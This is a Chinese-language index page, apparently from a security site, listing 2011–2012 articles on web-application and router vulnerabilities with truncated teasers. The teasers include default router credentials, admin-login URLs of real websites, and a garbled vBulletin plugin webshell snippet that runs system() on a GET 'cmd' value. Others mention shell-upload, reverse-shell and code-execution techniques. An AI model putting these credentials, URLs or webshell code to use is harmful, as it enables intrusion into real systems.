首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>漏洞资料>列表
破解无线路由器密码,常见无线密码
  日期:2012-03-20 10:04:04 点击:3043 评论:0
无线破解常见路由器账号密码: ================================ 路由器品牌 默认IP 默认帐号 默认密码 TP LINK TD8800 192.168.1.1 root root TPLINK 8830 192.168.10.200 root Root TP LINK R410 192.168.1.1 admin admin 中心831 192.168.1.1 ZXDSL ZXSDL Cyrix686
各大网站后台地址
  日期:2012-03-02 10:52:01 点击:1229 评论:0
中关村在线 http://groupadmin.zol.com.cn/manage/login.php MSN站 http://218.207.93.135/msn0905/admin/Login.aspx 5173站 http://partner.5173.com/admin/TempNewsAdmin.aspx 58同城网 http://www.fuzhou58.com/admin/ 中国移动10086站 http://admin4.rd139.com/ngos
[PCH-009]Security risk of php string offset
  日期:2012-02-08 14:00:57 点击:71 评论:0
[PCH-009]Security risk of php string offsetby ryat_at_www.80vul.com一、前言[关于PCH]PCH及Php Codz Hacking是80vul在2009年4月推出的一个项目,主要是在php源代码的基础分析和探讨一些可以给php应用安全带来影响的'特性'或者'漏洞'。这个项目最早起源于webzine 0x
Discuz x2 source/function/function_connect.php 泄漏服务器物理路径
  日期:2011-12-05 11:34:31 点击:152 评论:0
影响版本: Discuz x2漏洞描述: source/function/function_connect.php 文件头部没有加: if(!defined(IN_DISCUZ)) { exit(Access Denied); } 并且在头部包函了其他文件: require_once libfile(function/cloud); *参考 http://www.php0day.com/post/13248574191/discuz-
cacti后台登陆命令执行漏洞
  日期:2011-11-29 11:42:10 点击:1595 评论:0
简要描述: cacti后台登陆命令执行漏洞 详细说明: cacti后台登陆命令执行漏洞 漏洞证明: cacti后台登陆命令执行漏洞 反弹程序会以执行poll的权限来进行反弹.如果想以web server权限反弹直接点Graphs-任意一个监控主机的图片即可反弹 修复方案: 1.加强口令认证 2.限
DZ 最新爆路径地址
  日期:2011-11-28 12:06:23 点击:147 评论:0
DZ 最新爆路径地址 作者:落泪红尘[r00ts Security Team] 转载: http://hi.baidu.com/r00ts/blog/item/450cdff5f9872c12d8f9fd5b.html 今天在乌云看到的,但是乌云还没公布,那就发出来把. 地址为: dz爆路径 ucentercontroladmindb.php uc_servercontroladmindb.php
vBulletin 论坛全版本 后台拿shell
  日期:2011-11-23 17:01:31 点击:118 评论:2
在后台,进插件管理.添加插件. Ajax_complete 填入代码: if(isset( 在后台,进插件管理.添加插件. Ajax_complete 填入代码: ___FCKpd___0 激活 访问 www.site.com/forumlocation/ajax.php?cmd=command GET['cmd'])){echo h1cmd/h1pre; system( 在后台,进插件管理.添加
【Php】 AKCMS后台拿shell
  日期:2011-11-23 17:00:43 点击:195 评论:0
MakeBug Micropoor@163.com //akcmswelcome.php ?php //略 } elseif ($get_action== 'runsql' ){ if ( isset ($post_sql)){ $query=$db-query($post_sql); $body= '' ; if ($query!== true ! empty ($query)){ while ($result=$db-fetch_array($query)){ if ( empty (
【Asp】 ideacms文章管理系统 漏洞
  日期:2011-11-23 16:59:23 点击:212 评论:0
MakeBug Micropoor@163.com http://hi.baidu.com/micropoor 'adminadmin_upfile.asp % '略 dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath dim dirTemplate:dirTemplate= ../Upload dim path:path=getFo
Discuz! authcode() 弱IV缺陷
  日期:2011-11-17 12:55:01 点击:431 评论:0
与 上一篇 一样,此文是 2011 OWASP主题演讲 的补充。本文中也会发布在演讲中提到的演示代码。如果读者对密码学不是很熟悉,请先阅读之前的两篇blog文章。 Discuz!的authcode()函数是一个经典的流密码算法实现,discuz和ucenter的很多产品都使用此函数进行加解密。我从
PHPWind strcode() 加密算法设计缺陷
  日期:2011-11-16 14:21:30 点击:102 评论:0
本文只是补充 OWASP 2011上主题演讲 的一些细节。想了解背景可以参考此PPT。 由于时间匆忙,且家里发生了一些事情,所以这些都是2个月前的一些研究结果。代码也写得很粗糙,但基本能用。 描述 在PHPWind 8.x 中(甚至包括一些老版本),strcode()函数是核心的加密函数
phpcms 2008代码注射漏洞
  日期:2011-11-11 19:09:19 点击:108 评论:0
简要描述: phpcms2008的某参数可以进行代码注入。 详细说明: phpcms 2008的代码中由于对模板参数处理不当,导致可以任意执行任意代码文件。 具体的代码触发路径是这样的: phpcms/yp/product.php中获取pagesize参数,拼接为$urlrule变量。随后将之带入yp目录下的prod
JqueryUpload 大文件上传 任意文件上传漏洞
  日期:2011-10-25 13:57:12 点击:89 评论:0
1.猜解到目录后,直接访问default.aspx (可能需要修改参数uploadid,具体抓包可以看到,不能使undefined) 2.上传测试,抓包 3.修改上传的目录(可以任意指定) 4.猜测文件名:服务器返回的时间+8h,文件名=2011+不带0月++不带0日++不带0小时+分钟+秒-原文件名 加八小时
DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY
  日期:2011-10-14 17:32:56 点击:512 评论:0
影响版本: DEDECMS全版本 漏洞描叙: DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。 dedetempletslogin.htm 65行左右 input type=hidden name=gotopage value=?php if(!empty($gotopage)) echo $gotopage;? / 由于DEDECMS的全局变量注册机制
再谈QQ史上最大的“后门”
  日期:2011-09-19 11:37:32 点击:218 评论:0
为什么是再谈,因为这个安全问题已存在多年,且变成讳疾忌医的历史安全问题了,到底有多少人会因此受害,不得而知,堪称QQ的这个史上最大的后门。 我们先来科普腾讯单点登陆的某个工作流程,然后再说问题: 1.腾讯单点登录中心的HOST是 ptlogin2.qq.com ,打开wireshar
eWebEditor遍历目录上传漏洞
  日期:2011-09-16 09:02:49 点击:135 评论:0
受影响版本 eWebEditor 2.8 免费版 这两天没什么事情闲着无聊就打开了许久不用的WEB漏洞扫描工具对外的打某高校进行了注入漏洞检查!发现漏洞以后发现两所学校打网址是一个公司做的就开始了渗透.... 首先进入打是一个同服务器打分站后台!进入以后发现不能上传网页文件
PHP 跨目录档案上传漏洞
  日期:2011-09-05 10:09:00 点击:165 评论:0
受影響PHP版本 PHP 5.3.6 CVE: CVE 2011-2202 PHP bug #54939 File path injection vulnerability in RFC1867 File upload filename Submitted: 2011-05-27 漏洞说明: 1.关于$_FILES[$input_field_name]['name'] 在这个变量里包含着文件路径办认问题,但通常的情况下在
EasySiteEdit远程文件包含缺陷及修复
  日期:2011-08-29 10:36:56 点击:88 评论:0
EasySiteEdit远程文件包含缺陷及修复 Exploit Title: EasySiteEdit remote file include 作者:koskesh jakesh 下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip # Tested on: linux ------------------------------- vul:sublink.php lin
Nginx %00空字节执行php漏洞
  日期:2011-08-26 14:28:38 点击:2623 评论:0
by:blog.vfocus.net 脱裤黑客们又有的玩了。 Nginx如下版本: 0.5.*, 0.6.*, 0.7 = 0.7.65, 0.8 = 0.8.37 在使用PHP-FastCGI执行php的时候,URL里面在遇到%00空字节时与FastCGI处理不一致,导致可在非php文件中嵌入php代码,通过访问url+%00.php来执行其中的php代码。
Bo-Blog v1.4 单用户版分类列表文件读取漏洞 + 拿 WebShell
  日期:2011-08-22 12:34:56 点击:71 评论:0
这个是前几天,干某人站,发现用的这套程序,于是就下了一套研究(坑爹啊,04年的Blog程序现在居然还有人用,不过现在这位同学换了Blog程序,发出来也不怕万人轮了),挖了几个漏洞,这是其中一个,这套程序除了这个漏洞,还有各种XSS(取Cookie直接叼Shell,见下文)、
共37页/730条记录 首页 上一页 [1] [2] [3] 4 [5] [6] [7] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  入侵实例
  Exploits
  系统安全
  网络安全
  网络基础
  病毒分析
漏洞资料
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved